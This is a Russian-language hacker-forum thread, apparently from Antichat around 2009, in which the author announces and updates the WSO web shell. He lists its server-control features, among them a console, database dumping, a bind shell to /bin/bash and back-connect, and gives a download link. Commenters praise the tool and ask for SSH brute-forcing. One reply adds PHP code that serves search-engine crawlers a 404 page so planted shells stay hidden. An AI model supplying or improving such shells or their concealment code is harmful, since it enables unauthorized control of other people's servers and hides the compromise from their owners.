ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Избранное
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

WSO - веб-шелл
  #1  
Старый 26.01.2009, 12:21
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию WSO - веб-шелл

WSO2.4
Описание:
  • Авторизация
  • Информация о сервере
  • Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
  • Просмотр, hexview, редактирование, давнлоад, аплоад файлов
  • Работа с zip архивами (упаковка, распаковка)
  • Консоль
  • SQL менеджер (MySql, PostgreSql)
  • Выполнение PHP кода
  • Работа со строками + поиск хеша в онлайн базах
  • Биндпорт и бек-коннект (Perl)
  • Поиск текста в файлах
  • *nix/Windows
Из фишек
  • Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
  • Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
  • Можно использовать AJAX
  • Малый вес (24.32 KB)
  • Выбор кодировки, в которой работает шелл.

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Скачать: http://narod.ru/disk/18331224000/wso2.4.zip.html
Архив содержит последнюю версию шелла и небольшую тулзу WSOmanager - для работы с шеллами.

Последний раз редактировалось oRb; 01.06.2010 в 15:41..
 
Ответить с цитированием

  #2  
Старый 04.02.2009, 12:16
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Обновление:
  • Пофиксил баги
  • Мелкие исправления:
    - clear теперь очищает консоль, не делая запрос на сервер
    - При изменении кодировки, соединение с мускулом не "сбрасывается".
  • Добавлены
    - Bind port to /bin/bash
    - изменение даты модификации файла
  • Упаковал. Теперь вес (16 кб)
Первый пост обновил.

UPD:
еще несколько фиксов.
Спасибо: b3

Последний раз редактировалось oRb; 04.02.2009 в 13:17..
 
Ответить с цитированием

  #3  
Старый 20.02.2009, 17:56
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Обновление:
  • Уменьшен размер кода, генерируемого файловым менеджером
  • Добавлен новый сервис для расшифровки хеша
  • В файловом менеджере можно применять сортировки к столбцам
  • В SQL менеджере новый вывод таблиц (более наглядный, подсчет записей в каждой таблице)
  • Записи с длинным полями отображаются в компактном виде
  • Сделал возможность дампа бд. Можно выбирать конкретные таблицы.
  • В меню выделяется раздел, в котором находишься
  • Все формы в разделе Tools теперь нормальные (отправляются по enter'у)
  • Код местами переписан, + исправлены мелкие баги.

Отредактировал первый пост.
 
Ответить с цитированием

  #4  
Старый 24.02.2009, 10:59
Аватар для x-demon
x-demon
Постоянный
Регистрация: 10.06.2007
Сообщений: 476
Провел на форуме:
924649

Репутация: 299
Отправить сообщение для x-demon с помощью ICQ Отправить сообщение для x-demon с помощью AIM Отправить сообщение для x-demon с помощью MSN Отправить сообщение для x-demon с помощью Yahoo
По умолчанию

Отличная вещь. дизайн бы правда сменить
 
Ответить с цитированием

  #5  
Старый 24.02.2009, 22:06
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Цитата:
Сообщение от x-demon  
дизайн бы правда сменить
Скоро займусь 2й версией. По планам много будет изменено, дизайн в том числе.
 
Ответить с цитированием

  #6  
Старый 24.02.2009, 23:47
Аватар для heretic1990
heretic1990
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
Провел на форуме:
3728999

Репутация: 444
Exclamation

Цитата:
Сообщение от x-demon  
Отличная вещь. дизайн бы правда сменить
главное не дизайн, а функционал.

п.с. зачётный шелл!
 
Ответить с цитированием

  #7  
Старый 26.02.2009, 00:36
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Небольшие фиксы:
- нормальная работа при safe-mode
- после соединения с mysql сервером, кодировка устанавливалась с помощью функции mysql_set_charset. Почитал мануал повнимательней: PHP 5 >= 5.2.3. Пофиксил.
 
Ответить с цитированием

  #8  
Старый 20.09.2009, 01:32
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Да... пришёл к выводу, что этот шелл по всем параметрам превзошёл великий c99.
Полностью перехожу на него. На мой взгляд равных нету.

Только пару существенных замечаний. Было бы неплохо если убрать из шелла HTML вставки, сделав чистый php код. Уже было пара случаев, когда при особых условиях на сервере шелл не пахал. Пришлось самому убирать вставки, конечно это ИМХО, но всё-же было бы неплохо, если бы их не было.

Ну и ещё сделать 404 для всех поисковиков, а не только для гугла, php код:
Код:
 if(strpos($_SERVER['HTTP_USER_AGENT'], 'Yandex') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'YaDirectBot') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'James Bond') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'Rambler') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'ia_archiver') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
 
Ответить с цитированием

  #9  
Старый 21.03.2009, 14:28
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Опаньки)Ща испробуем.Будет ещё обновляться что-нить ?)

1)Или мне кажется,или r99 быстрее)
2) Я за смену дизайна(как у эрки) ).
3) Хорошо б замутить брут ssh+Брут по словарю))))))))
4)Бэкконекта чет не вижу,а вот биндя есть.


ЗЫ:Лови плюськи )

Обновляемый проект - хороший проект))).Буду(лично я - да) ждать с ультрамеганетерпением

Последний раз редактировалось Велемир; 21.03.2009 в 14:48..
 
Ответить с цитированием

  #10  
Старый 21.03.2009, 17:16
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Цитата:
Будет ещё обновляться что-нить ?)
Да, сейчас пишу вторую версию (переписываю с нуля). Будет заметно больше функционала, обновленный диз и нормальная кроссплатформенность.
Цитата:
1)Или мне кажется,или r99 быстрее)
не совсем понял, что ты имел в виду (c99 или r57). Все зависит от много, в том числе, какой именно функционал шелла используется. Но по скорости они не должны заметно отличаться.
Цитата:
3) Хорошо б замутить брут ssh+Брут по словарю))))))))
по словарю будет, ssh - посмотрим.
Цитата:
4)Бэкконекта чет не вижу,а вот биндя есть
да, его там нет, сам его написать не мог, а чужой код вставлять не хотелось.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета. SK | Heaton Мировые новости 5 13.06.2007 02:07
Переделанный шелл! k1b0rg PHP, PERL, MySQL, JavaScript 33 03.04.2007 08:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ